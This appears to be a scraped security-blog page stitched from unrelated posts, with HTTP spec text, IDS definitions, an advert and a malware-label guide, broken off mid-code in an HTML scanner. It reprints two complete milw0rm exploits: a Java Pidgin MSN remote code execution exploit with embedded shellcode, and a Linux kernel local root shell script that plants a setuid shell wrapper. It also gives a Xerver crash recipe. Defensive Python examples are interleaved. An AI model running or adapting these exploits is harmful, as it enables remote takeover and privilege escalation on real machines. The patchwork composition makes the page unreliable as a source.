Concerning security source and hacking
This guide explains how to set up mod_chroot with Apache2 on a Fedora 12 system. With mod_chroot, you can run Apache2 in a secure chroot environment and make your server less vulnerable to break-in attempts that try to exploit vulnerabilities in Apache2 or your installed web applications. I do not issue any guarantee that this will work for you!
Preliminary Note
I'm assuming that you have a running Fedora 12 system with a working Apache2, e.g. as shown in this tutorial: The Perfect Server - Fedora 12 x86_64 [ISPConfig 2]. In addition to that I assume that you have one or more web sites set up within the /var/www directory (e.g. if you use ISPConfig).
Source: read the full article at HowToForge.
Posted in Tutorial by buzz
Header Field Definitions
This section defines the syntax and semantics of all standard HTTP/1.1 header fields. For entity-header fields, both sender and recipient refer to either the client or the server, depending on who sends and who receives the entity.
Accept
The Accept request-header field can be used to specify certain media types which are acceptable for the response. Accept headers can be used to indicate that the request is specifically limited to a small set of desired types, as in the case of a request for an in-line image.
Accept           = "Accept" ":"
                   #( media-range [ accept-params ] )
media-range      = ( "*/*"
                   | ( type "/" "*" )
                   | ( type "/" subtype )
                   ) *( ";" parameter )
accept-params    = ";" "q" "=" qvalue *( accept-extension )
accept-extension = ";" token [ "=" ( token | quoted-string ) ]
The asterisk "*" character is used to group media types into ranges, with "*/*" indicating all media types and "type/*" indicating all subtypes of that type. The media-range MAY include media type parameters that are applicable to that range.
Each media-range MAY be followed by one or more accept-params, beginning with the "q" parameter for indicating a relative quality factor. The first "q" parameter (if any) separates the media-range parameter(s) from the accept-params. Quality factors allow the user or user agent to indicate the relative degree of preference for that media-range, using the qvalue scale from 0 to 1. The default value is q=1.
Note: Use of the "q" parameter name to separate media type parameters from Accept extension parameters is due to historical practice. Although this prevents any media type parameter named "q" from being used with a media range, such an event is believed to be unlikely given the lack of any "q" parameters in the IANA media type registry and the rare usage of any media type parameters in Accept. Future media types are discouraged from registering any parameter named "q".
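The grammar above is easiest to see in a parser. The Python below is an added example, not part of RFC 2616 or of any HTTP library: it parses an Accept header into media ranges, applies the precedence rule (the most specific matching range decides the quality, q=1 by default), keeps media type parameters apart from accept-extensions at the first "q", and rejects malformed qvalues instead of letting them reach the server's negotiation logic. The MediaRange type and the function names are assumptions. It handles the general case of media type parameters and accept-extensions, not only the examples quoted in the text.

```python
"""Parse an HTTP Accept header into media ranges and pick a response type."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# RFC 2616 qvalue: "0" with up to three decimals, or "1" with up to three zeros
_QVALUE = re.compile(r"^(?:0(?:\.\d{0,3})?|1(?:\.0{0,3})?)$")


@dataclass
class MediaRange:
    type: str
    subtype: str
    params: Dict[str, str]                      # media type parameters (before "q")
    q: float = 1.0                              # default value is q=1
    extensions: Dict[str, str] = field(default_factory=dict)  # accept-extension after "q"

    def matches(self, mtype: str, msubtype: str, mparams: Dict[str, str]) -> bool:
        if self.type == "*":
            return True
        if self.type != mtype:
            return False
        if self.subtype == "*":
            return True
        if self.subtype != msubtype:
            return False
        # A range carrying parameters only applies to a type that has the same ones
        return all(mparams.get(k) == v for k, v in self.params.items())

    def specificity(self) -> int:
        if self.type == "*":
            return 0
        if self.subtype == "*":
            return 1
        return 2 + len(self.params)


def _split(element: str) -> Tuple[str, str, List[Tuple[str, str]]]:
    """'type/subtype;a=b;q=0.5' -> ('type', 'subtype', [('a','b'), ('q','0.5')])."""
    parts = [p.strip() for p in element.split(";")]
    mtype, sep, msubtype = parts[0].lower().partition("/")
    if not sep or not mtype or not msubtype:
        raise ValueError(f"invalid media-range: {parts[0]!r}")
    pairs = []
    for p in parts[1:]:
        name, _, value = p.partition("=")
        pairs.append((name.strip().lower(), value.strip().strip('"')))
    return mtype, msubtype, pairs


def parse_accept(header: str) -> List[MediaRange]:
    ranges = []
    for element in header.split(","):
        if not element.strip():
            continue
        mtype, msubtype, pairs = _split(element)
        params, exts, q, seen_q = {}, {}, 1.0, False
        for name, value in pairs:
            if not seen_q and name == "q":
                # The first "q" separates media type parameters from accept-params
                if not _QVALUE.match(value):
                    raise ValueError(f"invalid qvalue: {value!r}")
                q, seen_q = float(value), True
            elif seen_q:
                exts[name] = value
            else:
                params[name] = value
        ranges.append(MediaRange(mtype, msubtype, params, q, exts))
    return ranges


def is_valid_accept(header: str) -> bool:
    try:
        parse_accept(header)
        return True
    except ValueError:
        return False


def quality(ranges: List[MediaRange], media_type: str) -> float:
    """Quality of a media type: the q of the most specific matching range, else 0."""
    mtype, msubtype, pairs = _split(media_type)
    applicable = [r for r in ranges if r.matches(mtype, msubtype, dict(pairs))]
    if not applicable:
        return 0.0
    return max(applicable, key=MediaRange.specificity).q


def negotiate(header: str, available: List[str]) -> Optional[str]:
    """Return the available type the client prefers most, or None if none is acceptable."""
    ranges = parse_accept(header)
    best, best_q = None, 0.0
    for mt in available:                 # earlier entries win ties
        qv = quality(ranges, mt)
        if qv > best_q:
            best, best_q = mt, qv
    return best
```

Run against the RFC's own example, `text/*;q=0.3, text/html;q=0.7, text/html;level=1, text/html;level=2;q=0.4, */*;q=0.5`, the qualities come out as the RFC lists them (text/html;level=1 is 1, text/html is 0.7, text/plain is 0.3, image/jpeg is 0.5). A header with `q=abc` or `q=2` is refused up front, which is the behaviour you want at a server edge rather than a float conversion error deep in the response path.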
Posted in Hacking Security, Tutorial by buzz
An intrusion detection system (IDS) is a device (or application) that monitors network and/or system activities for malicious activities or policy violations.
Intrusion detection is the process of monitoring the events occurring in a computer system or network and analyzing them for signs of possible incidents, which are violations or imminent threats of violation of computer security policies, acceptable use policies, or standard security practices. Intrusion prevention is the process of performing intrusion detection and attempting to stop detected possible incidents. Intrusion detection and prevention systems (IDPS) are primarily focused on identifying possible incidents, logging information about them, attempting to stop them, and reporting them to security administrators. In addition, organizations use IDPSs for other purposes, such as identifying problems with security policies, documenting existing threats, and deterring individuals from violating security policies. IDPSs have become a necessary addition to the security infrastructure of nearly every organization.
IDPSs typically record information related to observed events, notify security administrators of important observed events, and produce reports. Many IDPSs can also respond to a detected threat by attempting to prevent it from succeeding. They use several response techniques, which involve the IDPS stopping the attack itself, changing the security environment (e.g., reconfiguring a firewall), or changing the attack's content.
Source
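The Python below is an added example, not part of the original post or of any IDPS product. It is a small signature-plus-threshold detector run over constructed sshd log lines, and it illustrates the three functions the passage names: recording the event, alerting the administrator, and proposing a prevention response (here, a firewall rule). The SAMPLE_LOG lines, the Alert type, the regular expressions and the threshold are all constructed for the example.

```python
"""Minimal signature + threshold intrusion detection over sshd log lines."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample lines (not real logs); addresses are from documentation ranges.
SAMPLE_LOG = """\
Mar 10 08:01:01 host sshd[1201]: Failed password for invalid user admin from 203.0.113.7 port 51122 ssh2
Mar 10 08:01:03 host sshd[1202]: Failed password for root from 203.0.113.7 port 51123 ssh2
Mar 10 08:01:05 host sshd[1203]: Failed password for root from 203.0.113.7 port 51124 ssh2
Mar 10 08:01:09 host sshd[1204]: Accepted password for root from 203.0.113.7 port 51125 ssh2
Mar 10 08:02:00 host sshd[1205]: Accepted publickey for alice from 198.51.100.4 port 40000 ssh2
Mar 10 08:02:30 host sshd[1206]: Failed password for bob from 198.51.100.4 port 40001 ssh2
""".splitlines()

FAILED = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port")
ACCEPTED = re.compile(r"sshd\[\d+\]: Accepted \S+ for (\S+) from (\S+) port")


@dataclass
class Alert:
    kind: str                 # which signature fired
    source: str               # offending source address
    detail: str               # what the analyst should read
    response: Optional[str]   # prevention action, None for detect-only


def analyze(lines: List[str], threshold: int = 3) -> List[Alert]:
    """Detect brute force (threshold failures from one source) and a later success from it."""
    failures: Dict[str, int] = defaultdict(int)
    alerts: List[Alert] = []
    for line in lines:
        m = FAILED.search(line)
        if m:
            user, ip = m.groups()
            failures[ip] += 1
            if failures[ip] == threshold:            # fire once per source
                alerts.append(Alert("ssh-bruteforce", ip,
                                    f"{threshold} failed logins, last user {user!r}",
                                    response=f"iptables -I INPUT -s {ip} -j DROP"))
            continue
        m = ACCEPTED.search(line)
        if m:
            user, ip = m.groups()
            if failures[ip] >= threshold:            # success after a brute-force run
                alerts.append(Alert("ssh-success-after-bruteforce", ip,
                                    f"login as {user!r} succeeded after {failures[ip]} failures",
                                    response=None))
    return alerts


def report(alerts: List[Alert]) -> str:
    """Plain-text report of the kind an administrator would be notified with."""
    out = [f"{len(alerts)} alert(s)"]
    for a in alerts:
        action = a.response or "manual review"
        out.append(f"[{a.kind}] {a.source}: {a.detail} -> {action}")
    return "\n".join(out)


if __name__ == "__main__":
    print(report(analyze(SAMPLE_LOG)))
```

The detection part (the `analyze` function) and the response part (the `response` field) are kept separate on purpose: an IDS only reports, an IPS would apply the rule, and an organisation that only wants the detection can still use the same alerts for the policy-review and documentation purposes the passage lists.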
Posted in Hacking Security, Tutorial by buzz
Automate Your Penetration Testing
AVDS is a network vulnerability assessment appliance for networks of 50 to 200,000 nodes. It performs an in-depth inspection for security weaknesses that can replace exhaustive penetration testing. With each scan it will automatically find new equipment and services and add them to the inspection schedule. It then tests every node based on its characteristics and records your system's responses.
In a matter of hours, and with no network downtime or interruption of services, AVDS will generate detailed reports specifying network security weaknesses.
Our database of tests is updated daily with the most recently discovered security vulnerabilities. The AVDS database includes over 10,000 known vulnerabilities and the updates include discoveries by our own team and those discovered by corporate and private security teams around the world.
Simple, Fast and Comprehensive
Manual vulnerability assessment is expensive and infrequently done. Assessment software can be time consuming to set up and operate, is plagued by high false positive rates, and can cause network resource issues.
Automated Testing Using AVDS:
• Gets your tactical security work done routinely and quickly
• Provides the fixes you and your staff need for fast mitigation
• Buys you time to focus on security strategy
• Automatically scans new equipment, ports and applications
• Scales to handle multiple networks, business units, countries
• Reduces your patch-work by identifying exactly what is needed.
Security and Compliance Challenges
Read More
Posted in Hacking Security, Tutorial by buzz
Xerver v4.32 is a Windows based HTTP server. This is the latest version of
the application available.
Xerver v4.32 is vulnerable to a remote denial of service through the following means.
Xerver ships with a web based configuration program, essentially making this DoS
remote if and when the Remote Setup is running.
The admin package runs on port 32123 and does not require any form of
authentication to make changes to the server configuration.
- Bug -
If the HTTP Server port is set to any kind of letter combination, the server will
crash and be unable to be restarted unless the configuration file is manually
edited to remove the letters and put back to a number (ie. 80).
- Example -
1. http://172.16.2.101:32123/?action=wizardStep1
2. Enter anything in the port field, "Dr_IDE"
3. Click Save and Continue
- Results -
The server will crash hard, and you will be unable to restart it. You must edit the
configuration file, Xerver2.cfg and replace the first line of the file with a Port
number.
- Note -
I tried to make this a possible XSS attack but I couldn't manage. Perhaps someone
else can figure it out.
Methods and variables of interest for this attack:
SubmitForm()
document.myForm.portNR.value="80" # default, any letters here would kill the server
Source: milw0rm.com
Posted in Denial of Service, Tutorial by buzz
Pidgin MSN <= 2.5.8 Remote Code Execution
Pierre Nogues - pierz@hotmail.it
http://www.indahax.com/
Description:
Pidgin is a multi-protocol Instant Messenger.
This is an exploit for the vulnerability[1] discovered in Pidgin by core-security[2].
The library "libmsn" used by pidgin doesn't handle specially crafted MsnSlp packets
which could lead to memory corruption.
Affected versions :
Pidgin <= 2.5.8, Adium and other IM using Pidgin-libpurple/libmsn library.
Platforms :
Windows, Linux, Mac
Fix :
Fixed in Pidgin 2.5.9
Update to the latest version : http://www.pidgin.im/download/
References :
[1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694
[2] http://www.coresecurity.com/content/libpurple-arbitrary-write
[3] http://www.pidgin.im/news/security/?id=34
Usage :
You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/
javac.exe -cp "%classpath%;.\jml-1.0b3-full.jar" PidginExploit.java
java -cp "%classpath%;.\jml-1.0b3-full.jar" PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL
import net.sf.jml.*;
import net.sf.jml.event.*;
import net.sf.jml.impl.*;
import net.sf.jml.message.p2p.*;
import net.sf.jml.util.*;
public class PidginExploit {
private MsnMessenger messenger;
private String login;
private String password;
private String target;
private int session_id = NumberUtils.getIntRandom();
private byte shellcode[] = new byte[] {
/*
* if you use the stack in your shellcode do not forget to change esp because eip == esp == kaboom !
* sub esp,500
*/
(byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00,
/*
* windows/exec - 121 bytes
* http://www.metasploit.com
* EXITFUNC=process, CMD=calc.exe
*/
(byte) 0xfc, (byte) 0xe8, (byte) 0x44, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8b, (byte) 0x45,
(byte) 0x3c, (byte) 0x8b, (byte) 0x7c, (byte) 0x05, (byte) 0x78, (byte) 0x01, (byte) 0xef, (byte) 0x8b,
(byte) 0x4f, (byte) 0x18, (byte) 0x8b, (byte) 0x5f, (byte) 0x20, (byte) 0x01, (byte) 0xeb, (byte) 0x49,
(byte) 0x8b, (byte) 0x34, (byte) 0x8b, (byte) 0x01, (byte) 0xee, (byte) 0x31, (byte) 0xc0, (byte) 0x99,
(byte) 0xac, (byte) 0x84, (byte) 0xc0, (byte) 0x74, (byte) 0x07, (byte) 0xc1, (byte) 0xca, (byte) 0x0d,
(byte) 0x01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0x3b, (byte) 0x54, (byte) 0x24, (byte) 0x04,
(byte) 0x75, (byte) 0xe5, (byte) 0x8b, (byte) 0x5f, (byte) 0x24, (byte) 0x01, (byte) 0xeb, (byte) 0x66,
(byte) 0x8b, (byte) 0x0c, (byte) 0x4b, (byte) 0x8b, (byte) 0x5f, (byte) 0x1c, (byte) 0x01, (byte) 0xeb,
(byte) 0x8b, (byte) 0x1c, (byte) 0x8b, (byte) 0x01, (byte) 0xeb, (byte) 0x89, (byte) 0x5c, (byte) 0x24,
(byte) 0x04, (byte) 0xc3, (byte) 0x5f, (byte) 0x31, (byte) 0xf6, (byte) 0x60, (byte) 0x56, (byte) 0x64,
(byte) 0x8b, (byte) 0x46, (byte) 0x30, (byte) 0x8b, (byte) 0x40, (byte) 0x0c, (byte) 0x8b, (byte) 0x70,
(byte) 0x1c, (byte) 0xad, (byte) 0x8b, (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83,
(byte) 0xc0, (byte) 0x6a, (byte) 0x50, (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73,
(byte) 0x68, (byte) 0x98, (byte) 0xfe, (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7,
(byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65,
(byte) 0x00
};
// reteip = pointer to the return address in the stack
// The shellcode will be written just before reteip
// and reteip will automatically point to the shellcode. It's magic !
private int reteip = 0x0022CFCC; //stack on XP SP3-FR Pidgin 2.5.8
private int neweip;
private byte[] payload = new byte[shellcode.length + 4];
private int totallength = reteip + 4;
public static void main(String[] args) throws Exception {
if(args.length != 3){
System.out.println("PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL");
}else{
PidginExploit exploit = new PidginExploit(args[0],args[1],args[2]);
exploit.start();
}
}
public PidginExploit(String login, String password, String target){
this.login = login;
this.password = password;
this.target = target;
neweip = reteip - shellcode.length ;
for(int i=0;i<shellcode.length;i++) payload[i] = shellcode[i]; // shellcode first, then the 4-byte new return address
payload[shellcode.length] = (byte)(neweip & 0x000000FF);
payload[shellcode.length + 1] = (byte)((neweip & 0x0000FF00) >> 8);
payload[shellcode.length + 2] = (byte)((neweip & 0x00FF0000) >> 16);
payload[shellcode.length + 3] = (byte)((neweip & 0xFF000000) >> 24);
}
public void start() {
messenger = MsnMessengerFactory.createMsnMessenger(login,password);
messenger.getOwner().setInitStatus(MsnUserStatus.ONLINE);
messenger.setLogIncoming(false);
messenger.setLogOutgoing(false);
initMessenger(messenger);
messenger.login();
}
protected void initMessenger(MsnMessenger messenger) {
messenger.addContactListListener(new MsnContactListAdapter() {
public void contactListInitCompleted(MsnMessenger messenger) {
final Object id = new Object();
messenger.addSwitchboardListener(new MsnSwitchboardAdapter() {
public void switchboardStarted(MsnSwitchboard switchboard) {
if (id != switchboard.getAttachment())
return;
switchboard.inviteContact(Email.parseStr(target));
}
public void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) {
if (id != switchboard.getAttachment())
return;
MsnP2PSlpMessage msg = new MsnP2PSlpMessage();
msg.setIdentifier(NumberUtils.getIntRandom());
msg.setSessionId(session_id);
msg.setOffset(0);
msg.setTotalLength(totallength);
msg.setCurrentLength(totallength);
// This flag creates a bogus MsnSlpPacket in pidgin memory with a buffer pointing to null
// We'll use this buffer to rewrite memory in the stack
msg.setFlag(0x1000020);
msg.setP2PDest(target);
switchboard.sendMessage(msg);
System.out.println("First packet sent, waiting for the ACK");
}
public void switchboardClosed(MsnSwitchboard switchboard) {
System.out.println("switchboardClosed");
switchboard.getMessenger().removeSwitchboardListener(this);
}
public void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){
System.out.println("contactLeaveSwitchboard");
}
});
messenger.newSwitchboard(id);
}
});
messenger.addMessageListener(new MsnMessageAdapter(){
public void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) {
//We receive the ACK of our first packet with the ID of the new bogus packet
message.getIdentifier();
MsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip,
payload.length, payload, target);
switchboard.sendMessage(msg);
System.out.println("ACK received && Payload sent !");
System.out.println("Exploit OK ! CTRL+C to quit");
}
});
messenger.addMessengerListener(new MsnMessengerAdapter() {
public void loginCompleted(MsnMessenger messenger) {
System.out.println(messenger.getOwner().getEmail() + " login");
}
public void logout(MsnMessenger messenger) {
System.out.println(messenger.getOwner().getEmail() + " logout");
}
public void exceptionCaught(MsnMessenger messenger,
Throwable throwable) {
System.out.println("caught exception: " + throwable);
}
});
}
}
// Original source milw0rm.com [2009-09-09]
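The comments in the exploit describe the bug class: a peer-supplied offset and length are applied to a reassembly buffer without being checked against the size that was allocated for it. The Python below is an added example, not libpurple's code and not the exploit author's: it models a bounds-checked reassembler for fragmented P2P data messages in which every number the peer controls is validated before it touches a buffer. The Fragment and Transfer types, the MAX_TOTAL cap and the sample fragments are assumptions, and the model does not reproduce libpurple's real data structures.

```python
"""Bounds-checked reassembly of fragmented P2P data (model of the bug class, not libpurple code)."""
from dataclasses import dataclass
from typing import Dict, Optional

MAX_TOTAL = 4 * 1024 * 1024   # assumed cap on one transfer; the declared size is peer-controlled


@dataclass
class Fragment:
    """One P2P data message: every field here is chosen by the remote peer."""
    session_id: int
    offset: int
    total_length: int
    data: bytes


@dataclass
class Transfer:
    total_length: int
    buf: bytearray        # allocated once, exactly total_length bytes
    filled: bytearray     # 1 where a byte has been received
    received: int = 0


class ReassemblyError(ValueError):
    pass


class SafeReassembler:
    def __init__(self, max_total: int = MAX_TOTAL):
        self.max_total = max_total
        self.transfers: Dict[int, Transfer] = {}

    def reject_reason(self, f: Fragment) -> Optional[str]:
        """Return why a fragment is refused, or None when it is safe to store."""
        if not 0 < f.total_length <= self.max_total:
            return "total_length out of range"
        t = self.transfers.get(f.session_id)
        if t is not None and t.total_length != f.total_length:
            return "total_length changed mid-transfer"
        if f.offset < 0 or not f.data:
            return "negative offset or empty fragment"
        if f.offset + len(f.data) > f.total_length:
            return "fragment would write past the end of the buffer"
        return None

    def accepts(self, f: Fragment) -> bool:
        return self.reject_reason(f) is None

    def feed(self, f: Fragment) -> Optional[bytes]:
        """Store a fragment; return the whole message once every byte has arrived."""
        reason = self.reject_reason(f)
        if reason is not None:
            raise ReassemblyError(reason)
        t = self.transfers.get(f.session_id)
        if t is None:
            t = Transfer(f.total_length, bytearray(f.total_length), bytearray(f.total_length))
            self.transfers[f.session_id] = t
        end = f.offset + len(f.data)          # proven <= total_length above
        for pos in range(f.offset, end):      # count each byte once, duplicates are harmless
            if not t.filled[pos]:
                t.filled[pos] = 1
                t.received += 1
        t.buf[f.offset:end] = f.data          # in-bounds slice of the same length
        if t.received == t.total_length:
            del self.transfers[f.session_id]
            return bytes(t.buf)
        return None
```

The exploit's two ingredients map onto two of the checks: the "bogus packet" whose buffer is never allocated is impossible here because a buffer is created the moment a session is first seen and its size is pinned, and an offset equal to an address on the stack is refused by the `offset + len(data) > total_length` test before any write happens. Completeness is tracked per byte rather than by summing lengths, so a repeated fragment cannot make a transfer look finished early.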
Posted in Tutorial by buzz
FIXES
Notepad++ v5.4.5 fixed bugs (from v5.4.4)
1. Fix plugins shortcuts not working bug.
2. Fix the tooltip on toolbar display bug for the plugins icons.
3. Fix a crash that was occurring when searching in files from a deep path.
4. Fix a crash issue (Unicode binary) while closing Notepad++ with an RC file opened under Chinese XP.
5. Fix Pascal and Scheme syntax highlighting problem (fixes in styles.xml).
6. Add SQL folding capability.
Source: milw0rm.com
Posted in Tutorial by buzz
Requires register_globals = on and magic_quotes_gpc = off
Based on vulnerabilities discussed at http://www.milw0rm.org/exploits/8713
Coppermine Photo Gallery 1.4.22 Remote Exploit
Coded by girex
Source: milw0rm
Posted in Tutorial, Vulnerability by buzz
Note from the author: XSS is Cross Site Scripting. If you don't know how XSS (Cross Site Scripting) works, this page probably won't help you. This page is for people who already understand the basics of XSS attacks but want a deep understanding of the nuances regarding filter evasion. This page will also not show you how to mitigate XSS vectors or how to write the actual cookie/credential stealing/replay/session riding portion of the attack. It will simply show the underlying methodology and you can infer the rest. Also, please note my XSS page has been replicated by the OWASP 2.0 Guide in the Appendix section with my permission. However, because this is a living document I suggest you continue to use this site to stay up to date.
Also, please note that most of these cross site scripting vectors have been tested in the browsers listed at the bottom of the page; however, if you have specific concerns about outdated or obscure versions, please download them from Evolt. Please see the XML format of the XSS Cheat Sheet if you intend to use CAL9000 or other automated tools. If you have an RSS reader, feel free to subscribe to the Web Application Security RSS feed below, or join the forum.
Source: RSnake
Download Cheat Sheet, click here
Posted in Tutorial, XSS by buzz
#!/bin/sh
# gw-notexit.sh: Linux kernel <2.6.29 exit_notify() local root exploit
#
# by Milen Rangelov (gat3way-at-gat3way-dot-eu)
#
# Based on 'exit_notify()' CAP_KILL verification bug found by Oleg Nestorov.
# Basically it allows us to send arbitrary signals to a privileged (suidroot)
# parent process. Due to a bad check, the child process with appropriate exit signal
# already set can first execute a suidroot binary then exit() and thus bypass
# in-kernel privilege checks. We use chfn and gpasswd for that purpose.
#
# !!!!!!!!!!!
# Needs /proc/sys/fs/suid_dumpable set to 1 or 2. The default is 0
# so you'll be out of luck most of the time.
# So it is not going to be the script kiddies' new killer shit :-)
# !!!!!!!!!!!
#
# if you invent a better way to escalate privileges by sending arbitrary signals to
# the parent process, please mail me :) That was the best I could think of today :-(
#
# This one made me nostalgic about the prctl(PR_SET_DUMPABLE,2) madness
#
# Skuchna rabota...
#
####################################################################################
SUIDDUMP=`cat /proc/sys/fs/suid_dumpable`
if [ $SUIDDUMP -lt 1 ]; then echo -e "suid_dumpable=0 - system not vulnerable!\n";exit; fi
if [ -d /etc/logrotate.d ]; then
echo "logrotate installed, that's good!"
else
echo "No logrotate installed, sorry!";exit
fi
echo -e "Compiling the bash setuid() wrapper..."
cat >> /tmp/.m.c << EOF
#include
#include
int main()
{
setuid(0);
execl("/bin/bash","[kthreadd]",NULL);
}
EOF
cc /tmp/.m.c -o /tmp/.m
rm /tmp/.m.c
echo -e "Compiling the exploit code..."
cat >> /tmp/exploit.c << EOF
#include
#include
#include
#include
#include
int child(void *data)
{
sleep(2);
printf("I'm gonna kill the suidroot father without having root rights :D\n");
execl("/usr/bin/gpasswd","%s",NULL);
exit(0);
}
int main()
{
int stacksize = 4*getpagesize();
void *stack, *stacktop;
stack = malloc(stacksize);
stacktop = stack + stacksize;
chdir("/etc/logrotate.d");
int p = clone(child, stacktop, CLONE_FILES|SIGSEGV, NULL);
if (p>0) execl("/usr/bin/chfn","\n/tmp/.a\n{\nsize=0\nprerotate\n\tchown root /tmp/.m;chmod u+s /tmp/.m\nendscript\n}\n\n",NULL);
}
EOF
cc /tmp/exploit.c -o /tmp/.ex
rm /tmp/exploit.c
echo -e "Setting coredump limits and running the exploit...\n"
ulimit -c 10000
touch /tmp/.a
`/tmp/.ex >/dev/null 2>/dev/null`
sleep 5
rm /tmp/.ex
if [ -e /etc/logrotate.d/core ]; then
echo -e "Successfully coredumped into the logrotate config dir\nNow wait until cron.daily executes logrotate and makes your shell wrapper suid\n"
echo -e "The shell should be located in /tmp/.m - just run /tmp/.m after 24h and you'll be root"
echo -e "\nYour terminal is most probably screwed now, sorry for that..."
exit
fi
echo "The system is not vulnerable, sorry :("
# milw0rm.com [2009-04-08]
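The script's header names two preconditions: a kernel older than 2.6.29 and fs.suid_dumpable set to 1 or 2 (the default is 0). The Python below is an added example, not part of the script: it audits a host for exactly those two conditions from a uname release string and sysctl output, and reports the corrective setting for each. The function names, the sample sysctl text and the version parsing rule (numeric prefix only) are assumptions.

```python
"""Audit the two preconditions named in the script header: kernel < 2.6.29, fs.suid_dumpable != 0."""
import re
from typing import Dict, List, Tuple


def parse_kernel_version(release: str) -> Tuple[int, ...]:
    """'2.6.28.9-generic' -> (2, 6, 28, 9); distribution suffixes are ignored."""
    m = re.match(r"(\d+(?:\.\d+)*)", release)
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    return tuple(int(x) for x in m.group(1).split("."))


def kernel_affected(release: str) -> bool:
    """True for any kernel older than 2.6.29 (tuple comparison handles 2.6.28.9 < 2.6.29)."""
    return parse_kernel_version(release) < (2, 6, 29)


def parse_sysctl(text: str) -> Dict[str, str]:
    """Parse 'key = value' lines in the format printed by `sysctl -a`."""
    settings = {}
    for line in text.splitlines():
        if "=" in line:
            key, _, value = line.partition("=")
            settings[key.strip()] = value.strip()
    return settings


def audit(release: str, sysctl_text: str) -> List[str]:
    """Return one finding per precondition that holds on this host."""
    findings = []
    dumpable = parse_sysctl(sysctl_text).get("fs.suid_dumpable", "0")
    if dumpable != "0":
        findings.append(f"fs.suid_dumpable={dumpable}: setuid processes may dump core into "
                        f"directories such as /etc/logrotate.d; set it to 0 (sysctl -w fs.suid_dumpable=0)")
    if kernel_affected(release):
        findings.append(f"kernel {release} is older than 2.6.29: the exit_notify() CAP_KILL "
                        f"check bug is present; upgrade the kernel")
    return findings


# Constructed sample of sysctl output for a misconfigured host.
SAMPLE_SYSCTL = "fs.suid_dumpable = 2\nkernel.randomize_va_space = 2\n"

if __name__ == "__main__":
    import platform
    try:
        with open("/proc/sys/fs/suid_dumpable") as fh:
            live = "fs.suid_dumpable = " + fh.read().strip()
    except OSError:
        live = ""                      # not a Linux host, or no access
    for line in audit(platform.release(), live) or ["no findings"]:
        print(line)
```

Both findings are needed for the script to do anything, but the suid_dumpable one is worth fixing on its own: it is what lets a core file from a setuid process land in a directory that another privileged job later reads, which is the second half of the chain the script relies on.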
Posted in Exploit, Tutorial by buzz
Some terms you need to know first:
Malware (short for the English term "malicious software") is a computer program written for a specific purpose of its author; it looks for weaknesses in software. Malware is generally created to leak data from, or damage, a piece of software or an operating system. (Wikipedia)
Badware is malicious software that tracks your moves online and feeds that information back to shady marketing groups so that they can ambush you with targeted ads. If your every move online is checked by a pop-up ad, it's highly likely that you, like 59 million Americans, have spyware or other malicious badware on your computer.(Stopbadware.org)
Google, as the world's largest search engine, wants its search results to be clean and safe for searchers, both on the website side and on the SEO side. On the website side in particular, Google does not only crawl a site: it also scans the site to check whether its pages contain scripts that fall into the malware/badware category.
In this work Google partners with stopbadware.org to deliver information to the administrator of the suspect website. Google usually sends the email to one of:
abuse@website.com
admin@website.com
administrator@website.com
contact@website.com
info@website.com *
so you should set up one of the above addresses as a precaution, to catch the notification Google sends if your website is given the malware label.
Google also informs the public (Google Search users) that the website contains malware, by showing a warning with the search result.
Cause:
One way malware/badware gets into your website is a virus on your own computer. When you update the website (upload PHP or HTML files), whether by FTP or through a browser, the virus injects malware/badware scripts into the pages without you noticing. When Google then scans the site and finds the script, it labels the site as badware/malware in its SERP.
How to fix it:
To remove the badware/malware label from Google's SERP, you need to do the following:
1. Clean the malware/badware script out of your website's code.
2. Request a review from stopbadware.org.
3. Request a review from Google.
For step 3, requesting a review from Google, the procedure is:
1. You need a Google account (a Google email address will do).
2. Go to http://google.com/accounts and choose Webmaster / Webmaster Tools.
3. If that menu is not shown, you first have to sign up for Google Webmaster Tools.
4. Register your website in Google Webmaster Tools, then verify it.
5. After verification, open the Overview menu and click the Review site link.
Wait 2 x 24 hours; stopbadware.org will review your website and, if it really is clean of malware/badware, they will contact Google, which then performs its own review.
Once they confirm that your website is clean, the badware/malware label will soon be removed from Google's SERP; removing the label usually takes 1 x 24 hours, so be patient. :)
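Step 1 above, cleaning injected scripts out of the site, starts with finding them. The Python below is an added example, not from the original post, Google or stopbadware.org: it scans HTML for the kinds of injected content the post describes, namely hidden iframes, scripts loaded from hosts that are not yours, and eval/unescape-obfuscated inline script. The InjectionScanner class, the allowed-host set and the sample page are assumptions, and the rules are heuristics for a first pass over uploaded files, not a complete signature set.

```python
"""Scan HTML files for injected elements typical of a compromised website."""
from html.parser import HTMLParser
from typing import List, Set
from urllib.parse import urlparse


class InjectionScanner(HTMLParser):
    def __init__(self, allowed_hosts: Set[str]):
        super().__init__()
        self.allowed_hosts = {h.lower() for h in allowed_hosts}
        self.findings: List[str] = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            # Injected iframes are usually made invisible: zero/one pixel or display:none
            style = a.get("style", "").replace(" ", "").lower()
            tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
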